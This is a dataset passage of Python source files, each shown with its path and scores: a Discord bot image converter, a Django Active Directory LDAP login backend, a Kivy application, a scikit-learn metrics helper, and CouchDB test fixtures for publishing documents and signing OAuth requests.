urls = []
if matches:
for match in matches:
urls.append(match.group(1))
if mentions:
for mention in mentions:
user = ctx.guild.get_member(int(mention.group(1)))
if user is not None:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if not urls and ids:
for possible_id in ids:
user = ctx.guild.get_member(int(possible_id.group(0)))
if user:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if attachments:
for attachment in attachments:
urls.append(attachment.url)
if not urls and ctx.guild:
user = ctx.guild.get_member_named(argument)
if not user:
raise BadArgument("No images provided.")
if user.is_avatar_animated():
url = user.avatar_url_as(format="gif")
else:
url = user.avatar_url_as(format="png")
urls.append(url)
if not urls:
raise BadArgument("No images provided.")
return urls[0] | dankmemer/converters.py |
import re
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
IMAGE_LINKS = re.compile(r"(https?:\/\/[^\"\'\s]*\.(?:png|jpg|jpeg|gif|png|svg)(\?size=[0-9]*)?)")
MENTION_REGEX = re.compile(r"<@!?([0-9]+)>")
ID_REGEX = re.compile(r"[0-9]{17,}")
class ImageFinder(Converter):
"""This is a class to convert notsobots image searching capabilities into a more general
converter class."""
async def convert(self, ctx, argument):
attachments = ctx.message.attachments
mentions = MENTION_REGEX.finditer(argument)
matches = IMAGE_LINKS.finditer(argument)
ids = ID_REGEX.finditer(argument)
urls = []
if matches:
for match in matches:
urls.append(match.group(1))
if mentions:
for mention in mentions:
user = ctx.guild.get_member(int(mention.group(1)))
if user is not None:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if not urls and ids:
for possible_id in ids:
user = ctx.guild.get_member(int(possible_id.group(0)))
if user:
if user.is_avatar_animated():
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="gif")))
else:
url = IMAGE_LINKS.search(str(user.avatar_url_as(format="png")))
urls.append(url.group(1))
if attachments:
for attachment in attachments:
urls.append(attachment.url)
if not urls and ctx.guild:
user = ctx.guild.get_member_named(argument)
if not user:
raise BadArgument("No images provided.")
if user.is_avatar_animated():
url = user.avatar_url_as(format="gif")
else:
url = user.avatar_url_as(format="png")
urls.append(url)
if not urls:
raise BadArgument("No images provided.")
return urls[0] | 0.422147 | 0.189859 |
import ldap
from django.conf import settings
from django.contrib.auth.models import User
#stripped down version of http://djangosnippets.org/snippets/901/
class ActiveDirectoryGroupMembershipSSLBackend:
#----------------------------------------------------------------------
def authenticate(self,username=None,password=<PASSWORD>):
try:
if len(password) == 0:
return None
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.simple_bind_s(binddn,password)
l.unbind_s()
return self.get_or_create_user(username,password)
except ImportError:
pass
except ldap.INVALID_CREDENTIALS:
pass
#----------------------------------------------------------------------
def get_or_create_user(self, username, password):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
try:
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
ldap.set_option(ldap.OPT_REFERRALS,0) # DO NOT TURN THIS OFF OR SEARCH WON'T WORK!
# initialize
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
# bind
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.bind_s(binddn,password)
# search
result = l.search_ext_s(settings.AD_SEARCH_DN,ldap.SCOPE_SUBTREE,"sAMAccountName=%s" % username,settings.AD_SEARCH_FIELDS)[0][1]
# get personal info
mail = result.get("mail",[None])[0]
last_name = result.get("sn",[None])[0]
first_name = result.get("givenName",[None])[0]
l.unbind_s()
user = User(username=username,first_name=first_name,last_name=last_name,email=mail)
except Exception:
return None
user.is_staff = False
user.is_superuser = False
user.set_password('<PASSWORD>')
user.save()
return user
#----------------------------------------------------------------------
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None | qatrack/accounts/backends.py | import ldap
from django.conf import settings
from django.contrib.auth.models import User
#stripped down version of http://djangosnippets.org/snippets/901/
class ActiveDirectoryGroupMembershipSSLBackend:
#----------------------------------------------------------------------
def authenticate(self,username=None,password=<PASSWORD>):
try:
if len(password) == 0:
return None
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.simple_bind_s(binddn,password)
l.unbind_s()
return self.get_or_create_user(username,password)
except ImportError:
pass
except ldap.INVALID_CREDENTIALS:
pass
#----------------------------------------------------------------------
def get_or_create_user(self, username, password):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
try:
#ldap.set_option(ldap.OPT_X_TLS_CACERTFILE,settings.AD_CERT_FILE)
ldap.set_option(ldap.OPT_REFERRALS,0) # DO NOT TURN THIS OFF OR SEARCH WON'T WORK!
# initialize
l = ldap.initialize(settings.AD_LDAP_URL)
l.set_option(ldap.OPT_PROTOCOL_VERSION, 3)
# bind
binddn = "%s@%s" % (username,settings.AD_NT4_DOMAIN)
l.bind_s(binddn,password)
# search
result = l.search_ext_s(settings.AD_SEARCH_DN,ldap.SCOPE_SUBTREE,"sAMAccountName=%s" % username,settings.AD_SEARCH_FIELDS)[0][1]
# get personal info
mail = result.get("mail",[None])[0]
last_name = result.get("sn",[None])[0]
first_name = result.get("givenName",[None])[0]
l.unbind_s()
user = User(username=username,first_name=first_name,last_name=last_name,email=mail)
except Exception:
return None
user.is_staff = False
user.is_superuser = False
user.set_password('<PASSWORD>')
user.save()
return user
#----------------------------------------------------------------------
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None | 0.144059 | 0.071074 |
import os
import sys
from kivy.app import App
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.config import ConfigParser
from kivy.properties import ObjectProperty
from kivy.utils import get_hex_from_color
from libs.uix import customsettings
from libs.uix.dialogs import dialog
from libs.uix.kv.activity.baseclass.startscreen import StartScreen
from libs import programdata as data
from libs import programclass as _class
from kivymd.theming import ThemeManager
from kivymd.navigationdrawer import NavigationDrawer
class NavDrawer(NavigationDrawer):
events_callback = ObjectProperty()
class Program(App, _class.ShowPlugin, _class.ShowAbout, _class.ShowLicense):
'''Функционал программы.'''
settings_cls = customsettings.CustomSettings
customsettings.TEXT_INPUT = data.string_lang_enter_value
nav_drawer = ObjectProperty()
theme_cls = ThemeManager()
theme_cls.primary_palette = 'Teal'
def __init__(self, **kvargs):
super(Program, self).__init__(**kvargs)
Window.bind(on_keyboard=self.events_program)
self.data = data
self.open_exit_dialog = None
self.load_all_kv_files('{}/libs/uix/kv'.format(self.directory))
self.load_all_kv_files(
'{}/libs/uix/kv/activity'.format(self.directory)
)
def build_config(self, config):
config.adddefaultsection('General')
config.setdefault('General', 'language', 'Русский')
config.setdefault('General', 'theme', 'default')
def build_settings(self, settings):
with open('{}/data/settings/general.json'.format(
data.prog_path), 'r') as settings_json:
settings.add_json_panel(data.string_lang_settings, self.config,
data=settings_json.read().format(
language=data.string_lang_setting_language,
title=data.string_lang_setting_language_title,
desc=data.string_lang_setting_language_desc,
russian=data.string_lang_setting_language_russian,
english=data.string_lang_setting_language_english))
def build(self):
self.use_kivy_settings = False
self.title = data.string_lang_title # заголовок окна программы
self.icon = 'data/images/logo.png' # иконка окна программы
self.config = ConfigParser()
self.config.read('{}/program.ini'.format(data.prog_path))
# Главный экран программы.
self.screen = StartScreen(events_callback=self.events_program)
self.nav_drawer = NavDrawer(title=data.string_lang_menu)
return self.screen
def events_program(self, *args):
'''Вызывается при выборе одного из пунктов меню программы.'''
if len(args) == 2: # нажата ссылка
event = args[1]
else: # нажата кнопка программы
try:
_args = args[0]
event = _args if isinstance(_args, str) else _args.id
except AttributeError: # нажата кнопка девайса
event = args[1]
if data.PY2:
if isinstance(event, unicode):
event = event.encode('utf-8')
if event == data.string_lang_settings:
self.open_settings()
elif event == data.string_lang_exit_key:
self.exit_program()
elif event == data.string_lang_license:
self.show_license()
elif event == data.string_lang_plugin:
self.show_plugins()
elif event in (1001, 27):
self.back_screen(event)
elif event == 'About':
self.show_about()
return True
def back_screen(self, event):
'''Менеджер экранов.'''
# Нажата BackKey на главном экране.
if self.screen.ids.screen_manager.current == '':
if event in (1001, 27):
self.exit_program()
return
if len(self.screen.ids.screen_manager.screens) != 1:
self.screen.ids.screen_manager.screens.pop()
self.screen.ids.screen_manager.current = \
self.screen.ids.screen_manager.screen_names[-1]
self.set_current_item_tabbed_panel(
data.theme_text_color, get_hex_from_color(
data.color_action_bar
)
)
def exit_program(self, *args):
def close_dialog():
self.open_exit_dialog.dismiss()
self.open_exit_dialog = None
if self.open_exit_dialog:
return
self.open_exit_dialog = dialog(
text=data.string_lang_exit, title=self.title, dismiss=False,
buttons=[
[data.string_lang_yes, lambda *x: sys.exit(0)],
[data.string_lang_no, lambda *x: close_dialog()]
]
)
def load_all_kv_files(self, directory_kv_files):
for kv_file in os.listdir(directory_kv_files):
if kv_file in ('bugreporter.kv', '__init__.py') or \
os.path.isdir('{}/{}'.format(directory_kv_files, kv_file)):
continue
Builder.load_file('{}/{}'.format(directory_kv_files, kv_file))
def on_config_change(self, config, section, key, value):
'''Вызывается при выборе одного из пункта настроек программы.'''
if key == 'language':
if not os.path.exists('{}/data/language/{}.txt'.format(
self.directory, data.select_locale[value])):
dialog(
text=data.string_lang_not_locale.format(
data.select_locale[value]
),
title=self.title
)
config.set(section, key, data.old_language)
config.write()
self.close_settings()
def on_pause(self):
'''Ставит приложение на 'паузу' при выхоже из него.
В противном случае запускает программу заново'''
return True | program.py |
import os
import sys
from kivy.app import App
from kivy.lang import Builder
from kivy.core.window import Window
from kivy.config import ConfigParser
from kivy.properties import ObjectProperty
from kivy.utils import get_hex_from_color
from libs.uix import customsettings
from libs.uix.dialogs import dialog
from libs.uix.kv.activity.baseclass.startscreen import StartScreen
from libs import programdata as data
from libs import programclass as _class
from kivymd.theming import ThemeManager
from kivymd.navigationdrawer import NavigationDrawer
class NavDrawer(NavigationDrawer):
events_callback = ObjectProperty()
class Program(App, _class.ShowPlugin, _class.ShowAbout, _class.ShowLicense):
'''Функционал программы.'''
settings_cls = customsettings.CustomSettings
customsettings.TEXT_INPUT = data.string_lang_enter_value
nav_drawer = ObjectProperty()
theme_cls = ThemeManager()
theme_cls.primary_palette = 'Teal'
def __init__(self, **kvargs):
super(Program, self).__init__(**kvargs)
Window.bind(on_keyboard=self.events_program)
self.data = data
self.open_exit_dialog = None
self.load_all_kv_files('{}/libs/uix/kv'.format(self.directory))
self.load_all_kv_files(
'{}/libs/uix/kv/activity'.format(self.directory)
)
def build_config(self, config):
config.adddefaultsection('General')
config.setdefault('General', 'language', 'Русский')
config.setdefault('General', 'theme', 'default')
def build_settings(self, settings):
with open('{}/data/settings/general.json'.format(
data.prog_path), 'r') as settings_json:
settings.add_json_panel(data.string_lang_settings, self.config,
data=settings_json.read().format(
language=data.string_lang_setting_language,
title=data.string_lang_setting_language_title,
desc=data.string_lang_setting_language_desc,
russian=data.string_lang_setting_language_russian,
english=data.string_lang_setting_language_english))
def build(self):
self.use_kivy_settings = False
self.title = data.string_lang_title # заголовок окна программы
self.icon = 'data/images/logo.png' # иконка окна программы
self.config = ConfigParser()
self.config.read('{}/program.ini'.format(data.prog_path))
# Главный экран программы.
self.screen = StartScreen(events_callback=self.events_program)
self.nav_drawer = NavDrawer(title=data.string_lang_menu)
return self.screen
def events_program(self, *args):
'''Вызывается при выборе одного из пунктов меню программы.'''
if len(args) == 2: # нажата ссылка
event = args[1]
else: # нажата кнопка программы
try:
_args = args[0]
event = _args if isinstance(_args, str) else _args.id
except AttributeError: # нажата кнопка девайса
event = args[1]
if data.PY2:
if isinstance(event, unicode):
event = event.encode('utf-8')
if event == data.string_lang_settings:
self.open_settings()
elif event == data.string_lang_exit_key:
self.exit_program()
elif event == data.string_lang_license:
self.show_license()
elif event == data.string_lang_plugin:
self.show_plugins()
elif event in (1001, 27):
self.back_screen(event)
elif event == 'About':
self.show_about()
return True
def back_screen(self, event):
'''Менеджер экранов.'''
# Нажата BackKey на главном экране.
if self.screen.ids.screen_manager.current == '':
if event in (1001, 27):
self.exit_program()
return
if len(self.screen.ids.screen_manager.screens) != 1:
self.screen.ids.screen_manager.screens.pop()
self.screen.ids.screen_manager.current = \
self.screen.ids.screen_manager.screen_names[-1]
self.set_current_item_tabbed_panel(
data.theme_text_color, get_hex_from_color(
data.color_action_bar
)
)
def exit_program(self, *args):
def close_dialog():
self.open_exit_dialog.dismiss()
self.open_exit_dialog = None
if self.open_exit_dialog:
return
self.open_exit_dialog = dialog(
text=data.string_lang_exit, title=self.title, dismiss=False,
buttons=[
[data.string_lang_yes, lambda *x: sys.exit(0)],
[data.string_lang_no, lambda *x: close_dialog()]
]
)
def load_all_kv_files(self, directory_kv_files):
for kv_file in os.listdir(directory_kv_files):
if kv_file in ('bugreporter.kv', '__init__.py') or \
os.path.isdir('{}/{}'.format(directory_kv_files, kv_file)):
continue
Builder.load_file('{}/{}'.format(directory_kv_files, kv_file))
def on_config_change(self, config, section, key, value):
'''Вызывается при выборе одного из пункта настроек программы.'''
if key == 'language':
if not os.path.exists('{}/data/language/{}.txt'.format(
self.directory, data.select_locale[value])):
dialog(
text=data.string_lang_not_locale.format(
data.select_locale[value]
),
title=self.title
)
config.set(section, key, data.old_language)
config.write()
self.close_settings()
def on_pause(self):
'''Ставит приложение на 'паузу' при выхоже из него.
В противном случае запускает программу заново'''
return True | 0.243642 | 0.062103 |
from sklearn.metrics import recall_score, precision_score, roc_auc_score, accuracy_score
from sklearn.model_selection import train_test_split
import pickle
class Modeler:
"""
Modeler makes repetitive classification tasks simpler in Scikit-Learn.
Out of the box, it gives you common metrics such as recall, precision, accuracy, and AUC ROC.
Example:
--------------------------
Let's say you want to run a classification experiment. Here's how you do it:
>>> from easyml.modeler import Model
>>> modeler = Modeler(df, features, label, model, verbose=True)
>>> modeler.fit()
Getting metrics for train:
-----------------------------------------
recall_score: 1.0
precision_score: 1.0
roc_auc_score: 1.0
accuracy_score: 1.0
Getting metrics for test:
-----------------------------------------
recall_score: 0.9166666666666666
precision_score: 0.9166666666666666
roc_auc_score: 0.8869047619047619
accuracy_score: 0.8947368421052632
Getting metrics for full:
-----------------------------------------
recall_score: 0.9831932773109243
precision_score: 0.9831932773109243
roc_auc_score: 0.9774456952592357
accuracy_score: 0.9789103690685413
"""
def __init__(self, df, features, label, model, verbose=False):
'''
df = Pandas dataframe
features = Feature names array
label = label column in dataframe
model = initialized model for training
'''
self._df = df
self._features = features
self._label = label
self._model = model
self._metrics = {}
self._verbose = verbose
def fit(self):
X, y = self._df[self._features], self._df[self._label]
X_tr, X_ts, Y_tr, Y_ts = train_test_split(X, y, test_size=0.2)
self._model.fit(X_tr, Y_tr)
y_pred_train = self._model.predict(X_tr)
y_pred_test = self._model.predict(X_ts)
y_full = self._model.predict(X)
self._set_metrics(Y_tr, y_pred_train, 'train')
self._set_metrics(Y_ts, y_pred_test, 'test')
self._set_metrics(y, y_full, 'full')
def _set_metrics(self, y_true, y_pred, data_type):
'''
Data type can be train, test, or full
'''
if self._verbose:
print('Getting metrics for {}:'.format(data_type))
print('-----------------------------------------')
self._metrics[data_type] = {}
funcs = [recall_score, precision_score, roc_auc_score, accuracy_score]
for func in funcs:
metric_name = func.__name__
metric_score = func(y_true, y_pred)
if self._verbose:
print('{}: {}'.format(metric_name, metric_score))
self._metrics[data_type][metric_name] = metric_score
if self._verbose:
print()
def to_pickle(self, filename):
if self._verbose:
print('Saving to {}'.format(filename))
with open(filename, 'wb') as f:
pickle.dump(self, f)
def get_model(self):
return self._model
def get_metrics(self):
return self._metrics
def get_features(self):
return self._features | easyml/modeler.py | from sklearn.metrics import recall_score, precision_score, roc_auc_score, accuracy_score
from sklearn.model_selection import train_test_split
import pickle
class Modeler:
"""
Modeler makes repetitive classification tasks simpler in Scikit-Learn.
Out of the box, it gives you common metrics such as recall, precision, accuracy, and AUC ROC.
Example:
--------------------------
Let's say you want to run a classification experiment. Here's how you do it:
>>> from easyml.modeler import Model
>>> modeler = Modeler(df, features, label, model, verbose=True)
>>> modeler.fit()
Getting metrics for train:
-----------------------------------------
recall_score: 1.0
precision_score: 1.0
roc_auc_score: 1.0
accuracy_score: 1.0
Getting metrics for test:
-----------------------------------------
recall_score: 0.9166666666666666
precision_score: 0.9166666666666666
roc_auc_score: 0.8869047619047619
accuracy_score: 0.8947368421052632
Getting metrics for full:
-----------------------------------------
recall_score: 0.9831932773109243
precision_score: 0.9831932773109243
roc_auc_score: 0.9774456952592357
accuracy_score: 0.9789103690685413
"""
def __init__(self, df, features, label, model, verbose=False):
'''
df = Pandas dataframe
features = Feature names array
label = label column in dataframe
model = initialized model for training
'''
self._df = df
self._features = features
self._label = label
self._model = model
self._metrics = {}
self._verbose = verbose
def fit(self):
X, y = self._df[self._features], self._df[self._label]
X_tr, X_ts, Y_tr, Y_ts = train_test_split(X, y, test_size=0.2)
self._model.fit(X_tr, Y_tr)
y_pred_train = self._model.predict(X_tr)
y_pred_test = self._model.predict(X_ts)
y_full = self._model.predict(X)
self._set_metrics(Y_tr, y_pred_train, 'train')
self._set_metrics(Y_ts, y_pred_test, 'test')
self._set_metrics(y, y_full, 'full')
def _set_metrics(self, y_true, y_pred, data_type):
'''
Data type can be train, test, or full
'''
if self._verbose:
print('Getting metrics for {}:'.format(data_type))
print('-----------------------------------------')
self._metrics[data_type] = {}
funcs = [recall_score, precision_score, roc_auc_score, accuracy_score]
for func in funcs:
metric_name = func.__name__
metric_score = func(y_true, y_pred)
if self._verbose:
print('{}: {}'.format(metric_name, metric_score))
self._metrics[data_type][metric_name] = metric_score
if self._verbose:
print()
def to_pickle(self, filename):
if self._verbose:
print('Saving to {}'.format(filename))
with open(filename, 'wb') as f:
pickle.dump(self, f)
def get_model(self):
return self._model
def get_metrics(self):
return self._metrics
def get_features(self):
return self._features | 0.894617 | 0.503113 |
from contextlib import closing
from functools import wraps
from ijson.parse import items
from lr.lib.signing import reloadGPGConfig
from pylons import config
from uuid import uuid1
from LRSignature.sign.Sign import Sign_0_21
import base64
import copy
import couchdb
import gnupg
import ijson
import json
import logging
import os
import shutil
import tempfile
import time
import urllib, urlparse, oauth2, socket, uuid
import urllib2
log = logging.getLogger(__name__)
class SetFlowControl(object):
    """Decorator: temporarily enable/configure flow control on a node service doc.

    Around the wrapped test method, the named service document in the node
    database has its ``service_data`` section overwritten with the given
    flow-control settings; the original ``service_data`` is restored in a
    ``finally`` block even if the test fails.
    """
    def __init__(self,enabled,serviceDoc,doc_limit=100,id_limit=100):
        # enabled:    value stored as service_data['flow_control']
        # serviceDoc: _id of the service document to modify
        # doc_limit / id_limit: flow-control thresholds to install
        server = couchdb.Server(config['couchdb.url.dbadmin'])
        self.nodeDb = server[config['couchdb.db.node']]
        self.enabled = enabled
        self.serviceDoc = serviceDoc
        self.doc_limit=doc_limit
        self.id_limit=id_limit
    def __call__(self,f):
        @wraps(f)
        def set_flow_control(obj, *args, **kw):
            serviceDoc = self.nodeDb[self.serviceDoc]
            # Keep a deep copy so the nested dict can be restored untouched.
            service_data = copy.deepcopy(serviceDoc['service_data'])
            serviceDoc['service_data']['flow_control'] = self.enabled
            serviceDoc['service_data']['doc_limit'] = self.doc_limit
            serviceDoc['service_data']['id_limit'] = self.id_limit
            self.nodeDb[self.serviceDoc] = serviceDoc
            try:
                return f(obj, *args, **kw)
            finally:
                # Restore the saved section. NOTE(review): this relies on
                # couchdb-python updating serviceDoc['_rev'] in place on the
                # save above, so this second save does not conflict — confirm
                # against the couchdb-python Database docs.
                serviceDoc['service_data'] = service_data
                self.nodeDb[self.serviceDoc] = serviceDoc
        return set_flow_control
class ModifiedServiceDoc(object):
    """Decorator: run the wrapped callable against a modified service document.

    On entry the service document is fetched from the node database,
    deep-copied, optionally transformed by the ``update`` callable, and
    saved. On exit (success or failure) the original document is written
    back, refreshed with the current ``_rev`` so the restore save succeeds.
    """
    def __init__(self, service_doc_id, update=None):
        node_server = couchdb.Server(config['couchdb.url.dbadmin'])
        self.nodeDb = node_server[config['couchdb.db.node']]
        self.service_doc_id = service_doc_id
        self.update_fn = update
    def __call__(self, f):
        @wraps(f)
        def run_with_modified_doc(*args, **kw):
            saved_doc = self.nodeDb[self.service_doc_id]
            working_doc = copy.deepcopy(saved_doc)
            if self.update_fn:
                working_doc = self.update_fn(working_doc)
            self.nodeDb[self.service_doc_id] = working_doc
            try:
                return f(*args, **kw)
            finally:
                # Adopt whatever revision is current before restoring.
                saved_doc["_rev"] = self.nodeDb[self.service_doc_id]["_rev"]
                self.nodeDb[self.service_doc_id] = saved_doc
        return run_with_modified_doc
def update_authz(basicauth=False, oauth=False):
    """Build an update function (for ModifiedServiceDoc) that sets service authz.

    The returned callable mutates a service document in place: it ensures a
    ``service_auth`` dict exists and replaces its ``service_authz`` list with
    the selected mechanisms ("basicauth" and/or "oauth"), or ["none"] when
    neither flag is set. Returns the same document for chaining.
    """
    def update(orig):
        # Tolerate a missing or null "service_auth" section; the original
        # document may carry None here.
        orig["service_auth"] = orig.get("service_auth") or {}
        authz = []
        if basicauth:
            authz.append("basicauth")
        if oauth:
            authz.append("oauth")
        if not authz:
            authz.append("none")
        orig["service_auth"]["service_authz"] = authz
        return orig
    return update
def ForceCouchDBIndexing():
    """Decorator factory that forces CouchDB view indexing around a test.

    Returns a decorator for test methods. The wrapper queries every view of
    every design document in the resource-data database before and after the
    wrapped test runs, so view results reflect current documents.
    """
    json_headers = {"Content-Type": "application/json"}
    couch = {
        "url": config["couchdb.url"],
        "resource_data": config["couchdb.db.resourcedata"]
    }
    def indexTestData(obj):
        # Enumerate all design documents in the database.
        opts = {
            "startkey": "_design/",
            "endkey": "_design0",
            "include_docs": True
        }
        design_docs = obj.db.view('_all_docs', **opts)
        for row in design_docs:
            if "views" in row.doc and row.doc["views"]:
                for view in row.doc["views"]:
                    view_name = "{0}/_view/{1}".format(row.key, view)
                    # A cheap limit=1 query is enough to trigger a full
                    # index build for the view.
                    index_opts = {"limit": 1, "descending": 'true'}
                    if "reduce" in row.doc["views"][view]:
                        index_opts["reduce"] = 'false'
                    req = urllib2.Request(
                        "{url}/{resource_data}/{view}?{opts}".format(
                            view=view_name, opts=urllib.urlencode(index_opts), **couch),
                        headers=json_headers)
                    try:
                        urllib2.urlopen(req)
                    except Exception as e:
                        # Indexing failures are non-fatal for tests: log the
                        # request and the actual error, then continue.
                        log.info("Problem indexing: %s (%s)", req, e)
    def test_decorator(fn):
        @wraps(fn)
        def test_decorated(self, *args, **kw):
            try:
                indexTestData(self)
                return fn(self, *args, **kw)
            finally:
                # Re-index after the test so later queries see its writes.
                indexTestData(self)
        return test_decorated
    return test_decorator
def PublishTestDocs(sourceData, prefix, sleep=0, force_index=True):
json_headers = {"Content-Type": "application/json"}
test_data_log = "test-data-%s.log" % prefix
couch = {
"url": config["couchdb.url"],
"resource_data": config["couchdb.db.resourcedata"]
}
    @ModifiedServiceDoc(config['lr.publish.docid'], update_authz())
    def writeTestData(obj, **kw):
        """Publish every document in sourceData through the /publish endpoint.

        Optionally signs each document when kw supplies PGP key material
        ("pgp_keys", "gnupghome", "gpgbin"). Records published ids on
        obj.test_data_ids[prefix], appends each id to the on-disk log, and
        returns kw with "test_data_ids" added.
        """
        try:
            key = kw["pgp_keys"][0]
            signer = Sign_0_21(privateKeyID=key["fingerprint"], passphrase=key["passphrase"], gnupgHome=kw["gnupghome"], gpgbin=kw["gpgbin"], publicKeyLocations=key["locations"])
        except:
            # Best-effort: no key material supplied -> publish unsigned.
            signer = None
        if not hasattr(obj, "test_data_ids"):
            obj.test_data_ids = {}
        obj.test_data_ids[prefix] = []
        with open(test_data_log, "w") as plog:
            for doc in sourceData:
                # Assign a prefixed unique id when the fixture lacks one.
                if "doc_ID" not in doc:
                    doc["doc_ID"] = prefix+str(uuid1())
                try:
                    doc = signer.sign(doc)
                except:
                    # Also swallows signer=None (AttributeError): doc stays
                    # unsigned in that case.
                    pass
                obj.app.post('/publish', params=json.dumps({"documents": [ doc ]}), headers=json_headers)
                plog.write(doc["doc_ID"] + os.linesep)
                obj.test_data_ids[prefix].append(doc["doc_ID"])
                # Optional pause between publishes (throttling).
                if sleep > 0:
                    time.sleep(sleep)
        kw["test_data_ids"] = obj.test_data_ids[prefix]
        return kw
def indexTestData(obj):
if force_index == False:
return
opts = {
"startkey":"_design/",
"endkey": "_design0",
"include_docs": True
}
design_docs = obj.db.view('_all_docs', **opts)
for row in design_docs:
if "views" in row.doc and len(row.doc["views"].keys()) > 0:
for view in row.doc["views"].keys():
# view = row.doc["views"].keys()[0]
view_name = "{0}/_view/{1}".format( row.key, view)
index_opts = { "limit": 1, "descending": 'true'}
if "reduce" in row.doc["views"][view]:
index_opts["reduce"] = 'false'
# log.error("Indexing: {0}".format( view_name))
req = urllib2.Request("{url}/{resource_data}/{view}?{opts}".format(view=view_name, opts=urllib.urlencode(index_opts), **couch),
headers=json_headers)
try:
res = urllib2.urlopen(req)
except Exception, e:
log.info("Problem forcing index: %s", e)
# view_result = obj.db.view(view_name, **index_opts)
# log.error("Indexed: {0}, got back: {1}".format(view_name, json.dumps(res.read())))
else:
pass# log.error("Not Indexing: {0}".format( row.key))
def cacheTestData(obj, **kw):
req = urllib2.Request("{url}/{resource_data}/_all_docs?include_docs=true".format(**couch),
data=json.dumps({"keys":obj.test_data_ids[prefix]}),
headers=json_headers)
res = urllib2.urlopen(req)
docs = list(items(res, 'rows.item.doc'))
if not hasattr(obj, "test_data_sorted"):
obj.test_data_sorted = {}
def sortkey(k):
try:
return k['node_timestamp']
except:
return k['create_timestamp']
obj.test_data_sorted[prefix] = sorted(docs, key=lambda k: sortkey(k))
kw["test_data_sorted"] = obj.test_data_sorted[prefix]
return kw
def removeTestData(obj):
for doc_id in obj.test_data_ids[prefix]:
try:
del obj.db[doc_id]
except Exception as e:
print e.message
try:
del obj.db[doc_id+"-distributable"]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
try:
del obj.test_data_ids[prefix]
except Exception as e:
print e.message
def test_decorator(fn):
def test_decorated(self, *args, **kw):
try:
#print "Wrapper Before...."
kw = writeTestData(self, **kw)
indexTestData(self)
kw = cacheTestData(self, **kw)
return fn(self, *args, **kw)
except :
raise
finally:
removeTestData(self)
indexTestData(self)
#print "Wrapper After...."
return test_decorated
return test_decorator
def getExtraEnvironment(base_url=None):
env = {}
if base_url:
scheme, netloc, path, query, fragment = urlparse.urlsplit(base_url)
if query or fragment:
raise ValueError(
"base_url (%r) cannot have a query or fragment"
% base_url)
if scheme:
env['wsgi.url_scheme'] = scheme
if netloc:
if ':' not in netloc:
if scheme == 'http':
netloc += ':80'
elif scheme == 'https':
netloc += ':443'
else:
raise ValueError(
"Unknown scheme: %r" % scheme)
host, port = netloc.split(':', 1)
env['SERVER_PORT'] = port
env['SERVER_NAME'] = host
env['HTTP_HOST'] = netloc
if path:
env['SCRIPT_NAME'] = urllib.unquote(path)
return env
class OAuthRequest(object):
def __init__(self, path, http_method="GET", url_base="http://www.example.com", oauth_user_attrib="oauth_user", oauth_info_attrib="oauth" ):
self.oauth_user_attrib = oauth_user_attrib
self.oauth_info_attrib = oauth_info_attrib
self.http_method = http_method
self.url_base = url_base
self.path = path
self.server = couchdb.Server(config['couchdb.url.dbadmin'])
self.users = self.server[config['couchdb.db.users']]
def __call__(self, fn):
def create_user(oauth_user):
try:
del self.users[oauth_user["_id"]]
except:
pass
finally:
print oauth_user
self.users.save(oauth_user)
def remove_user(oauth_user):
try:
del self.users[oauth_user["_id"]]
except:
pass
@wraps(fn)
def test_decorator(cls, *args, **kwargs):
if (hasattr(cls, self.oauth_user_attrib)):
self.oauth_user = getattr(cls, self.oauth_user_attrib)
else:
err = AttributeError()
err.message = "Missing attribute '%s' which should be data for CouchDB OAuth User" % self.oauth_user_attrib
raise err
consumer = oauth2.Consumer(key=self.oauth_user["name"], secret=self.oauth_user["oauth"]["consumer_keys"][self.oauth_user["name"]])
token = oauth2.Token(key="node_sign_token", secret=self.oauth_user["oauth"]["tokens"]["node_sign_token"])
params = {
"oauth_signature_method": "HMAC-SHA1",
}
req = oauth2.Request.from_consumer_and_token(consumer, token, http_method=self.http_method, http_url="{0}{1}".format(self.url_base, self.path), parameters=params)
# Sign the request.
signature_method = oauth2.SignatureMethod_HMAC_SHA1()
req.sign_request(signature_method, consumer, token)
header = req.to_header()
header["Authorization"] = str(header["Authorization"])
extraEnv = getExtraEnvironment(self.url_base)
class OauthInfo(object):
def __init__(self, consumer, token, request, header, extraEnv, path):
self.consumer = consumer
self.token = token
self.request = request
self.header = header
self.env = extraEnv
self.path = path
setattr(cls, self.oauth_info_attrib, OauthInfo(consumer, token, req, header, extraEnv, self.path))
try:
create_user(self.oauth_user)
result = fn(cls, *args, **kwargs)
return result
finally:
delattr(cls, self.oauth_info_attrib)
remove_user(self.oauth_user)
return test_decorator
class BasicAuthRequest(object):
def __init__(self, bauth_user_attrib="bauth_user", bauth_info_attrib="bauth" ):
self.bauth_user_attrib = bauth_user_attrib
